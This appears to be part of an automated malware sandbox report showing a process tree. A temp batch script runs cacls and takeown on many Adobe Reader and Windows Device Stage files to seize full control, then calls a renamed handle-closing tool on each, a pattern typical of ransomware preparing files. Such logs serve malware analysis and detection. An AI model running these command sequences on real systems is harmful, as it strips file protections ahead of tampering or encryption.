  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1096
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1600
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""
  2⤵
  PID:1436
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:1372
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"
    3⤵
    - Modifies file permissions
    PID:280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:1984
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:204
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1528
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""
  2⤵
  PID:216
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"
    3⤵
    PID:304
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "bl.gif" -nobanner
    3⤵
    PID:1944
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "bl.gif" -nobanner
      4⤵
      PID:1564
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1512
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""
  2⤵
  PID:1856
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C
    3⤵
    PID:1412
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"
    3⤵
    PID:1096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "forms_super.gif" -nobanner
    3⤵
    PID:920
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "forms_super.gif" -nobanner
      4⤵
      PID:1100
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:568
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""
  2⤵
  PID:220
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C
    3⤵
    PID:840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "review_browser.gif" -nobanner
    3⤵
    PID:228
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "review_browser.gif" -nobanner
      4⤵
      PID:1940
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1136
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""
  2⤵
  PID:1044
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C
    3⤵
    PID:1232
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "tl.gif" -nobanner
    3⤵
    PID:1080
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "tl.gif" -nobanner
      4⤵
      PID:1236
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1680
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""
  2⤵
  PID:1540
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"
    3⤵
    PID:1600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "Identity-V" -nobanner
    3⤵
    PID:920
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "Identity-V" -nobanner
      4⤵
      PID:1204
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:1332
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "MyriadPro-Bold.otf" -nobanner
    3⤵
    PID:228
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "MyriadPro-Bold.otf" -nobanner
      4⤵
      PID:976
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1276
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""
  2⤵
  PID:836
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"
    3⤵
    PID:1236
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:836
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "SC_Reader.exe" -nobanner
    3⤵
    PID:1080
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "SC_Reader.exe" -nobanner
      4⤵
      PID:1548
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1708
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""
  2⤵
  PID:1748
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"
    3⤵
    - Modifies file permissions
    PID:568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "brt55.ths" -nobanner
    3⤵
    PID:1352
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "brt55.ths" -nobanner
      4⤵
      PID:964
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1644
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""
  2⤵
  PID:1412
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"
    3⤵
    PID:1136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "usa03.hsp" -nobanner
    3⤵
    PID:708
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "usa03.hsp" -nobanner
      4⤵
      PID:1772
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""
  2⤵
  PID:840
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C
    3⤵
    PID:1944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "CYRILLIC.TXT" -nobanner
    3⤵
    PID:216
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "CYRILLIC.TXT" -nobanner
      4⤵
      PID:1436
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1564
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""
  2⤵
  PID:1232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C
    3⤵
    PID:1204
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"
    3⤵
    - Modifies file permissions
    PID:1856
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "CP1252.TXT" -nobanner
    3⤵
    PID:920
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "CP1252.TXT" -nobanner
      4⤵
      PID:1540
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1604
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""
  2⤵
  PID:1164
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:976
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"
    3⤵
    PID:220
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:708
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1804
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:212
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""
  2⤵
  PID:280
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1680
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"
    3⤵
    PID:1436
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:836
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1564
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:840
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""
  2⤵
  PID:640
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"
    3⤵
    - Modifies file permissions
    PID:1352
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:1588
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "behavior.xml" -nobanner
      4⤵
      PID:1604
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1232
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""
  2⤵
  PID:1372
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:220
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"
    3⤵
    PID:1804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:708
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1412
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1748
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat""
  2⤵
  PID:1528
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C
    3⤵
    PID:216
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Network\Downloader\qmgr1.dat"
    3⤵
    - Modifies file permissions
    PID:1664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "qmgr1.dat" -nobanner
    3⤵
    PID:1692
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "qmgr1.dat" -nobanner
      4⤵
      PID:304
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1944
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:1916
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:920
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    PID:1100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "device.png" -nobanner
    3⤵
    PID:1996
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "device.png" -nobanner
      4⤵
      PID:1096
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1856
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""
  2⤵
  PID:964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1516
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"
    3⤵
    PID:212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1332
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1984
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1772
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""
  2⤵
  PID:228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:1564
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:836
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:600
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1680
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""
  2⤵
  PID:1080
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1604
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"
    3⤵
    - Modifies file permissions
    PID:1600
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1588
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:640
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1848
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""
  2⤵
  PID:1644
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1412
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"
    3⤵
    PID:1164
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:708
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1372
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1496
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:976
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:304
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    - Modifies file permissions
    PID:1548
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "background.png" -nobanner
    3⤵
    PID:1692
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "background.png" -nobanner
      4⤵
      PID:1528
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1276
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""
  2⤵
  PID:1436
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1096
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"
    3⤵
    - Modifies file permissions
    PID:564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1996
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:280
    - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
        
        7FvmLmKL.exe -accepteula "resource.xml" -nobanner
        5⤵
        
        PID:1604
- - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
    7FvmLmKL.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\Zn1vrgo8.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""
  2⤵
  PID:1080
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"
    3⤵
    PID:1136
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7FvmLmKL.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:1332
  - - C:\Users\Admin\AppData\Local\Temp\7FvmLmKL.exe
      7FvmLmKL.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:568
